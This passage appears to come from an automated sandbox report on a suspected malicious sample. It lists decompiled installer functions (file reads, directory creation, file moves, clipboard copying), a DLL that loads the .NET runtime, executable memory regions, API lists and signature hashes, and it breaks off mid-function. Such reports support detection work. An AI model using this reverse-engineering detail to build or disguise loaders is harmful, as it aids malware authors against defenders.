                                                                                                                                                    • Instruction Fuzzy Hash: B8E065315C96229AEF711EEA5C1CBDA779C9F833F5F120520AC29DA284EB61CC0086E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403336, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00403336(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x40c010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                    0x0040333a
                                                                                                                                                    0x0040334d
                                                                                                                                                    0x00403355
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040335c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040335e

                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F9B0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2111968516-0
                                                                                                                                                    • Opcode ID: 32e54b2931765dfec17d6a3a4df33818aa05352584e5027f4c49bdc741c8798d
                                                                                                                                                    • Instruction ID: 21e8d2ee52446cf907bb96d8b74bbad8e2c984a2f7d78a686bf0b93e0c01fa3e
                                                                                                                                                    • Opcode Fuzzy Hash: 32e54b2931765dfec17d6a3a4df33818aa05352584e5027f4c49bdc741c8798d
                                                                                                                                                    • Instruction Fuzzy Hash: 10E04FB5900208EBCB00DFE8E8419AEB3B9AB58200B40491DE9069B341EB31AA14D7D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E629420, Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E629431
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                      • Part of subcall function 6E629700: LoadLibraryW.KERNEL32(mscoree.dll,3920FDCC,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446,00000000,6E69F8E0), ref: 6E629734
                                                                                                                                                      • Part of subcall function 6E629700: GetLastError.KERNEL32(00000000,00000073,C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446,00000000), ref: 6E62976B
                                                                                                                                                      • Part of subcall function 6E629700: GetProcAddress.KERNEL32(00000000,CorBindToRuntimeEx), ref: 6E629792
                                                                                                                                                      • Part of subcall function 6E629700: GetLastError.KERNEL32(?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E6297A1
                                                                                                                                                      • Part of subcall function 6E629700: FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E6297AE
                                                                                                                                                      • Part of subcall function 6E629700: FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,6E6813E5,000000FF,?,6E629446), ref: 6E629847
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AllocatorDebugErrorFreeHeapLast$AddressLoadProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2936703648-0
                                                                                                                                                    • Opcode ID: 00ef7260adbbf1c31eb9912a32b14daaa630b32bbe857564a68db894be4fc625
                                                                                                                                                    • Instruction ID: f3c76d61ab8404f52e4d66b4434f18aa72e9b2f5fbf79b476cbb05d60413e7dd
                                                                                                                                                    • Opcode Fuzzy Hash: 00ef7260adbbf1c31eb9912a32b14daaa630b32bbe857564a68db894be4fc625
                                                                                                                                                    • Instruction Fuzzy Hash: 5AE01A70A04048AFCB08DFD5C9619EEB769AF8531CB1044BDA41A57240CB306F00DF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004037F8, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004037F8(void* __ecx, void* __eflags) {
				void* _t2;
				void* _t5;
				void* _t6;

				_t6 = __ecx;
				E00406064(0x4e30c8);
				_t2 = E00405D51(0x4e30c8);
				if(_t2 != 0) {
					E0040674E(0x4e30c8);
					CreateDirectoryW(0x4e30c8, 0); // executed
					_t5 = E00405EAB(_t6, 0x4df0c0, 0x4e30c8); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                                                    0x004037f8
                                                                                                                                                    0x004037ff
                                                                                                                                                    0x00403805
                                                                                                                                                    0x0040380c
                                                                                                                                                    0x00403811
                                                                                                                                                    0x00403819
                                                                                                                                                    0x00403825
                                                                                                                                                    0x0040382b
                                                                                                                                                    0x0040380f
                                                                                                                                                    0x0040380f
                                                                                                                                                    0x0040380f

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E66144C, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000000,00000000,?,6E6613B0,00000000,00000000,?,?,?,6E6314AA,00000000,00000000), ref: 6E661455
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: c85ea9ca39361c4eec763803c711904d20d89c091b1a602a2e85db03e16e460d
                                                                                                                                                    • Instruction ID: 1c8b8af7fcfe66cc6a78fcd72f5f4615a38bde319f59773401bbfb400f9cfdbe
                                                                                                                                                    • Opcode Fuzzy Hash: c85ea9ca39361c4eec763803c711904d20d89c091b1a602a2e85db03e16e460d
                                                                                                                                                    • Instruction Fuzzy Hash: 31D02B3120212517CB444EE684105677B05DF035F87004215EDB9CB290C331581583C1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E651161, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6E651168
                                                                                                                                                      • Part of subcall function 6E651523: __EH_prolog3.LIBCMT ref: 6E65152A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                    • Opcode ID: 8bb7e79f35855cd768942a763afdc1705115b34db9c4d1664440d2b17c8ab4be
                                                                                                                                                    • Instruction ID: 6a8dc6c5629277cf58ae5bb67300cccd76807766eb97dbe5dde7c086e6eaacf7
                                                                                                                                                    • Opcode Fuzzy Hash: 8bb7e79f35855cd768942a763afdc1705115b34db9c4d1664440d2b17c8ab4be
                                                                                                                                                    • Instruction Fuzzy Hash: B5E08CB1B50509ABCB01AFD0CC00BEEB77ABF9031CF208915A2514A390CBB18920DB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406C94, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E00406C94(WCHAR* _a4, WCHAR* _a8) {
				int _t6;

				if(E00406328(1) == 0) {
					L2:
					_push(_a8);
					_push(_a4);
					_t6 = E00406AC5();
				} else {
					_t6 = MoveFileExW(_a4, _a8, 5); // executed
					if(_t6 == 0) {
						goto L2;
					}
				}
				 *0x47eb70 =  *0x47eb70 + 1;
				return _t6;
			}




                                                                                                                                                    0x00406c9d
                                                                                                                                                    0x00406caf
                                                                                                                                                    0x00406caf
                                                                                                                                                    0x00406cb3
                                                                                                                                                    0x00406cb7
                                                                                                                                                    0x00406c9f
                                                                                                                                                    0x00406ca9
                                                                                                                                                    0x00406cad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406cad
                                                                                                                                                    0x00406cbe
                                                                                                                                                    0x00406cc4

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • MoveFileExW.KERNELBASE(00000000,00000000,00000005,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406CA9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFileHandleLibraryLoadModuleMoveProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2025429017-0
                                                                                                                                                    • Opcode ID: d0e0291ba1c5e68fccd58cb3e21c6279019306ecd07a682c2fe8f024bd8e2c9e
                                                                                                                                                    • Instruction ID: dd0cf632a7a07eea131958f651352625afa4b0b26f8695a9e27b87cafaac8404
                                                                                                                                                    • Opcode Fuzzy Hash: d0e0291ba1c5e68fccd58cb3e21c6279019306ecd07a682c2fe8f024bd8e2c9e
                                                                                                                                                    • Instruction Fuzzy Hash: F3D05E311083027DEB016762DD01A1B7BA5EF84359F12843FB99AA00F1EB36C4729E09
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403368, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00403368(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40c010, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                                    0x00403376
                                                                                                                                                    0x0040337c

                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403885, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00403885() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x40c010; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40c010 =  *0x40c010 | 0xffffffff;
					_t6 =  *0x40c010;
				}
				E00403CAF();
				_t3 = E00406CC7(_t6, 0x4e70d0, 7); // executed
				return _t3;
			}






                                                                                                                                                    0x00403885
                                                                                                                                                    0x0040388d
                                                                                                                                                    0x00403890
                                                                                                                                                    0x00403896
                                                                                                                                                    0x00403896
                                                                                                                                                    0x00403896
                                                                                                                                                    0x0040389d
                                                                                                                                                    0x004038a9
                                                                                                                                                    0x004038ae

                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                    • Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
                                                                                                                                                    • Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                    • Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0EA70483, Relevance: .0, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.367184500.000000000EA70000.00000040.00000001.sdmp, Offset: 0EA70000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 68228b353c41d3fde00eb493cfb07164b3f939fa046f8406f3f47afbe782fdd0
                                                                                                                                                    • Instruction ID: 58cd5dbd92b79ea64539dee25d88447fcbd026d43c86424344bf3a2d87cf8014
                                                                                                                                                    • Opcode Fuzzy Hash: 68228b353c41d3fde00eb493cfb07164b3f939fa046f8406f3f47afbe782fdd0
                                                                                                                                                    • Instruction Fuzzy Hash: 9F01DF3030421467C314A6BDEC80A9A77D7AFC8214F1ACA29D249CB344DF71AC0A87D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0EA70488, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.367184500.000000000EA70000.00000040.00000001.sdmp, Offset: 0EA70000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f24146e9a70afedec28aa5db0958b62eab8010bdb9d372bcc09a2082fd77691
                                                                                                                                                    • Instruction ID: 8097e5e31f907b58a6823c042b617b3045a313a18f1039adb55b827b10f20439
                                                                                                                                                    • Opcode Fuzzy Hash: 2f24146e9a70afedec28aa5db0958b62eab8010bdb9d372bcc09a2082fd77691
                                                                                                                                                    • Instruction Fuzzy Hash: 5301DF3070830497C304A6BDDC90AAE77D7AFC8215F16CA2AD24ACB344DF31AC0987D5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0E89D007, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.373547863.000000000E89D000.00000040.00000001.sdmp, Offset: 0E89D000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33806e3feebd2c36ce5a3d33651b30ae55b4529b1aad9c012e1c9a6c6bbb0f88
                                                                                                                                                    • Instruction ID: 678a1a89cab45a94ef1b7b0b2988a4da9c8e9a775d5147ef8a3b26066ce4446e
                                                                                                                                                    • Opcode Fuzzy Hash: 33806e3feebd2c36ce5a3d33651b30ae55b4529b1aad9c012e1c9a6c6bbb0f88
                                                                                                                                                    • Instruction Fuzzy Hash: FB01696180D3C49FEB124A258C94652BFA8EF43224F1984CBE984CF2E7C2695C48C772
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0E89D01D, Relevance: .0, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.373547863.000000000E89D000.00000040.00000001.sdmp, Offset: 0E89D000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d1df3a73e448a9f1fb73dbfa6a64b37d357b7483260e7ea715e5175a90d1114d
                                                                                                                                                    • Instruction ID: f82a97eecd079f56e0082bd415c4aa93a845ef5011f4aabd63a9d7cef3252b4b
                                                                                                                                                    • Opcode Fuzzy Hash: d1df3a73e448a9f1fb73dbfa6a64b37d357b7483260e7ea715e5175a90d1114d
                                                                                                                                                    • Instruction Fuzzy Hash: F701F771808348AEEF108A16CC80B67BBD8EF41228F0DC959ED048B2C6D3799C45D6B5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0EA70439, Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000003.367184500.000000000EA70000.00000040.00000001.sdmp, Offset: 0EA70000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 293c823e1d0229a2caf2367e04f81bc8362d67e13023b51a5ce418213899d5cb
                                                                                                                                                    • Instruction ID: 5937176f0905ccf6699ca0958f192a6b09ac62d24ec4af340e99cd1104b60698
                                                                                                                                                    • Opcode Fuzzy Hash: 293c823e1d0229a2caf2367e04f81bc8362d67e13023b51a5ce418213899d5cb
                                                                                                                                                    • Instruction Fuzzy Hash: 32E0C23261C2E15FC300962CFC1984A7FEAEFC231070A497BA080DB184D9A08C0A87E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 004050F9, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E004050F9(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v48;
				signed int _v52;
				int _v56;
				int _v60;
				signed int _v64;
				int _v68;
				void* _v72;
				int _v80;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t92;
				unsigned int _t97;
				int _t99;
				int _t100;
				void* _t107;
				short _t111;
				short _t112;
				intOrPtr _t132;
				struct HWND__* _t136;
				intOrPtr _t138;
				int _t160;
				int _t161;
				struct HMENU__* _t166;
				struct HWND__* _t170;
				struct HWND__* _t171;
				void* _t173;
				void* _t174;
				short* _t175;

				_t171 =  *0x476a6c;
				_t160 = 0;
				_v8 = _t171;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405073, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L18:
						if(_a8 != 0x404) {
							L26:
							if(_a8 != 0x7b || _a12 != _t171) {
								goto L21;
							} else {
								_t92 = SendMessageW(_t171, 0x1004, _t160, _t160);
								_a8 = _t92;
								if(_t92 <= _t160) {
									L12:
									return 0;
								}
								_t166 = CreatePopupMenu();
								AppendMenuW(_t166, _t160, 1, E00406831(_t160, _t166, _t171, _t160, 0xffffffe1));
								_t97 = _a16;
								if(_t97 != 0xffffffff) {
									_t161 = _t97;
									_t99 = _t97 >> 0x10;
								} else {
									GetWindowRect(_t171,  &_v28);
									_t161 = _v28.left;
									_t99 = _v28.top;
								}
								_t100 = TrackPopupMenu(_t166, 0x180, _t161, _t99, _t160, _a4, _t160);
								_t173 = 1;
								if(_t100 == 1) {
									_v80 = _t160;
									_v68 = 0x451d98;
									_v64 = 0x1001f;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t173 = _t173 + SendMessageW(_v8, 0x1073, _a4,  &_v88) + 2;
									} while (_a4 != _t160);
									OpenClipboard(_t160);
									EmptyClipboard();
									_t107 = GlobalAlloc(0x42, _t173 + _t173);
									_a4 = _t107;
									_t174 = GlobalLock(_t107);
									do {
										_v68 = _t174;
										_t175 = _t174 + SendMessageW(_v8, 0x1073, _t160,  &_v88) * 2;
										_t111 = 0xd;
										 *_t175 = _t111;
										_t112 = 0xa;
										 *((short*)(_t175 + 2)) = _t112;
										_t174 = _t175 + 4;
										_t160 = _t160 + 1;
									} while (_t160 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(0xd, _a4);
									CloseClipboard();
								}
								goto L12;
							}
						}
						if( *0x476a74 == _t160) {
